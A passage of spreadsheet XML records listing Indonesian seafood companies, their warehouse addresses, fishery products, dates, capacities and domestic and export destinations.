    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Segar"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21319"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Rajungan Segar"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20375"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teripang Kering"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20376"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cacing Laut Kering"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20378"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Perut Ikan Kering"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21001"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teripang Kering"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21009"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Segar"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21010"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Keong Segar"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21024"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cacing Laut Kering"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21151"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kepiting Beku"/>
    <d v="2020-06-25T00:00:00"/>
    <n v="604736"/>
    <m/>
    <s v="France, Japan, Netherlands, Spain, United Kingdom, United States"/>
  </r>
  <r>
    <n v="21337"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Lobster Beku"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21338"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rajungan Beku"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21339"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21340"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Lobster Segar"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21341"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rajungan Segar"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21342"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kepiting Segar"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21343"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Mata Goyang, Kerapu, Kakatua, Kakap, Kurisi)"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21344"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21345"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kepiting Beku"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21314"/>
    <x v="2"/>
    <s v="PT. ALAM JAYA"/>
    <s v="JL. Rungkut Industri II/25, Kel. Tenggilis Mejoyo, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Air Tawar Beku (Lele, Mas, Gurami, Bandeng, Patin, Nila)"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="413164.7"/>
    <s v="Kabupaten Probolinggo, Kota Surabaya, Kabupaten Sumbawa, Kota Balikpapan, Kota Tarakan, Kota Ambon"/>
    <s v="Malaysia, Philippines, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="17674"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Teri, Lemuru, Tongkol, Kembung, Marlin, Layaran, Selar, Layang, Tenggiri, Selar Kuning)"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="17675"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Amberjack, Malong, Lencam, Kuwe, Kuniran, Kerapu, Layur, Bawal, Kakap, Kaci-kaci, Kuro, Barramundi)"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="17677"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="20381"/>
    <x v="29"/>
    <s v="PT, MARITIM NUSANTARA PERKASA"/>
    <s v="Kawasan Pelabuhan Perikanan Nizam Zachman Jl, Muara Baru Ujung Blok T No,8 RT 020 RW 017, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Swanggi, Bawal, Gulama, Pisang-pisang, Kerapu, Layur, Kakap, Kurisi)"/>
    <d v="2020-03-12T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20811"/>
    <x v="84"/>
    <s v="PT. MUTIARA LAUT ABADI"/>
    <s v="Jl. Pulau Buton KIM II Mabar, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="720000"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="20812"/>
    <x v="84"/>
    <s v="PT. MUTIARA LAUT ABADI"/>
    <s v="Jl. Pulau Buton KIM II Mabar, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Mata Besar, Gulama, Senangin, Kerapu, Layur, Bawal, Kakap)"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="720000"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="21115"/>
    <x v="85"/>
    <s v="PT. BINTANG SAMUDRA SUKSES"/>
    <s v="Jl. Muara Baru Ujung Blok K No.6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-07-01T00:00:00"/>
    <n v="193000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21116"/>
    <x v="85"/>
    <s v="PT. BINTANG SAMUDRA SUKSES"/>
    <s v="Jl. Muara Baru Ujung Blok K No.6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Kerapu, Layur, Bawal, Kaca Piring, Kakap, Ekor Kuning, Barramundi)"/>
    <d v="2020-07-01T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21117"/>
    <x v="85"/>
    <s v="PT. BINTANG SAMUDRA SUKSES"/>
    <s v="Jl. Muara Baru Ujung Blok K No.6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Cakalang, Tenggiri)"/>
    <d v="2020-07-01T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21133"/>
    <x v="62"/>
    <s v="PT. TIMUR JAYA CEMERLANG"/>
    <s v="Jl. Kapten Samadikun No. 34 RT 01 RW 05, Kel. Kesenden, Kec. Kejaksan, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Rajungan Beku"/>
    <d v="2020-08-14T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21134"/>
    <x v="62"/>
    <s v="PT. TIMUR JAYA CEMERLANG"/>
    <s v="Jl. Kapten Samadikun No. 34 RT 01 RW 05, Kel. Kesenden, Kec. Kejaksan, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-08-14T00:00:00"/>
    <n v="19000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19955"/>
    <x v="13"/>
    <s v="PT. SAMUDERA INDO SEJAHTERA"/>
    <s v="Jl. Dullah Raya Km 8, Kel. Ngadi, Kec. Pulau Dullah Utara, Kota Tual&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="20545"/>
    <x v="51"/>
    <s v="PT, AGROMINA WICAKSANA"/>
    <s v="Jl, Berbek Industri V No,25 B, Kel, Berbek, Kec, Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Biji Nangka, Kerapu, Layur, Kurisi, Cunang)"/>
    <d v="2020-05-18T00:00:00"/>
    <n v="700000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="20640"/>
    <x v="47"/>
    <s v="KOPERASI PERIKANAN MINA RIZKI ABADI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Brondong, Kawasan PPDI RT 01 RW 05 Jompong, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Beku"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Lamongan"/>
    <s v="Korea, Democratic People's Republic of, Saudi Arabia, Viet Nam"/>
  </r>
  <r>
    <n v="20566"/>
    <x v="86"/>
    <s v="PT. INDOSUKSES MANDIRI ABADI"/>
    <s v="Desa Molowahu, Kec. Tibawa, Kabupaten Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Udang Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="19507"/>
    <x v="87"/>
    <s v="PT. SUKSES LAUTAN INDONESIA"/>
    <s v="Jl. Tanjung Tembaga Barat Pelabuhan Probolinggo, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Bandeng, Patin, Nila, Gurame)"/>
    <d v="2020-04-17T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia, China, Malaysia, Singapore, Thailand, United States"/>
  </r>
  <r>
    <n v="20054"/>
    <x v="43"/>
    <s v="PT. MAKMUR JAYA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok J No.8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="2380"/>
    <m/>
    <s v="Taiwan, Province of China, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="20788"/>
    <x v="88"/>
    <s v="PT. BALI MAYA PERMAI FOOD CANNING INDUSTRY"/>
    <s v="Jl. Raya Pengambengan, Kel. Tegal Badeng Barat, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Sarden Kaleng, Makarel Kaleng"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="519769"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kota Surabaya, Kabupaten Jembrana, Kota Denpasar, Kabupaten Jayapura"/>
    <s v="Ghana, Japan, Korea, Democratic People's Republic of, Nigeria"/>
  </r>
  <r>
    <n v="19631"/>
    <x v="75"/>
    <s v="UD, NAGATA TUNA"/>
    <s v="Jl, Cot Aron 2 No,2, Kel, Punge Blang Cut, Kec, Jaya Baru, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Pelagis Segar (Kembung, Lemadang, Marlin, Layaran, Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Batam, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Hong Kong, Japan, Malaysia, Saudi Arabia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="19842"/>
    <x v="69"/>
    <s v="CV. ALAM CIPTA SAMUDRA"/>
    <s v="Jl. Perancis Pergudangan Kosambi Permai Blok II 30, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Natuna"/>
    <s v="China, Malaysia, Singapore, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20735"/>
    <x v="19"/>
    <s v="PT. SEAFOOD SUMATERA PERKASA"/>
    <s v="Jl. Titi Pahlawan No.38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="France, Hong Kong, Italy, Malaysia, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20786"/>
    <x v="88"/>
    <s v="PT. BALI MAYA PERMAI FOOD CANNING INDUSTRY"/>
    <s v="Jl. Raya Pengambengan, Kel. Tegal Badeng Barat, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Kaleng"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="2440774"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kota Surabaya, Kabupaten Jembrana, Kota Denpasar, Kabupaten Jayapura"/>
    <s v="Japan, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="19899"/>
    <x v="89"/>
    <s v="PD. JAYA SAKTI"/>
    <s v="Jl. Pasir Putih RT 10, Kel. Sungai Kapitan, Kec. Kumai, Kabupaten Kotawaringin Barat&lt;br&gt;Kalimantan Tengah"/>
    <n v="21"/>
    <s v="Udang Beku"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="55000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung"/>
    <s v="China, Hong Kong, Japan, Malaysia, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19367"/>
    <x v="90"/>
    <s v="PT. CHEN WOO FISHERY"/>
    <s v="Jl. Kima 4 Kav K-9 Blok B2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Barat, Kota Surabaya, Kota Manado"/>
    <s v="Canada, Denmark, Japan, Netherlands, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20724"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Teripang Beku"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Pusat"/>
    <s v="Japan, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="20340"/>
    <x v="91"/>
    <s v="PT. TOBA SURIMI INDUSTRIES"/>
    <s v="Jl. Pulau Pinang 2, Kawasan Industri Medan II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Rebus Beku"/>
    <d v="2020-06-15T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="Italy, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="20200"/>
    <x v="92"/>
    <s v="CV, SUMBER LAUT REJEKI"/>
    <s v="Jl, Pelelangan Baru Dermaga 1 No,28-29 Muara Angke, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-05-13T00:00:00"/>
    <n v="8400000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, India, Malaysia, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="16886"/>
    <x v="93"/>
    <s v="PT. AWINDO INTERNATIONAL"/>
    <s v="Jl. Cumi Raya No.7 Pelabuhan Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-05-13T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Japan, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20632"/>
    <x v="94"/>
    <s v="CV. SINAR TIRTA"/>
    <s v="Jl. Rembang Industri VII/3 Pier Pasuruan, Kel. Pejangkungan, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Beku"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="525"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Japan, Sri Lanka, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="19712"/>
    <x v="95"/>
    <s v="PT. BLUESEA SEAFOOD INDUSTRY"/>
    <s v="Jl. Blanak No.1 Blok B1 No.19 Kawasan Pelabuhan Perikanan Pantai Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Bawal, Kakap, Baronang, Ayam-ayam, Kurisi, Cunang)"/>
    <d v="2020-03-18T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19713"/>
    <x v="95"/>
    <s v="PT. BLUESEA SEAFOOD INDUSTRY"/>
    <s v="Jl. Blanak No.1 Blok B1 No.19 Kawasan Pelabuhan Perikanan Pantai Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-18T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19714"/>
    <x v="95"/>
    <s v="PT. BLUESEA SEAFOOD INDUSTRY"/>
    <s v="Jl. Blanak No.1 Blok B1 No.19 Kawasan Pelabuhan Perikanan Pantai Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Deho, Makerel, Lemadang)"/>
    <d v="2020-03-18T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20132"/>
    <x v="80"/>
    <s v="CV. JASA LAUT"/>
    <s v="Jl. Kapten Muslim Komplek Tata Plaza No.12B, Kel. Dwi Kora, Kec. Medan Helvetia, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Hidup"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Chile, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20549"/>
    <x v="96"/>
    <s v="PT. BERKAH ANEKA LAUT"/>
    <s v="Jl. Lingkar Utara Mangunharjo, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Demersal Beku (Kakap Putih, Mata Besar, Swanggi, Bawal Hitam, Kerisi, Gulama, Lencam, Sebelah, Senangin, Anggoli, Kerapu, Layur, Jenaha, Sukang)"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Malaysia, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="20470"/>
    <x v="97"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG AMBON"/>
    <s v="Jl. Kapten Piere Tendean, Kel. Galala, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Kembung, Layang, Cakalang)"/>
    <d v="2020-04-27T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="Japan, Korea, Democratic People's Republic of, Sri Lanka"/>
  </r>
  <r>
    <n v="20324"/>
    <x v="98"/>
    <s v="CV. SARANA MAJU BERSAMA"/>
    <s v="Jl. Perjuangan Dusun III No.476, Kel. Helvetia, Kec. Labuhan Deli, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Hidup"/>
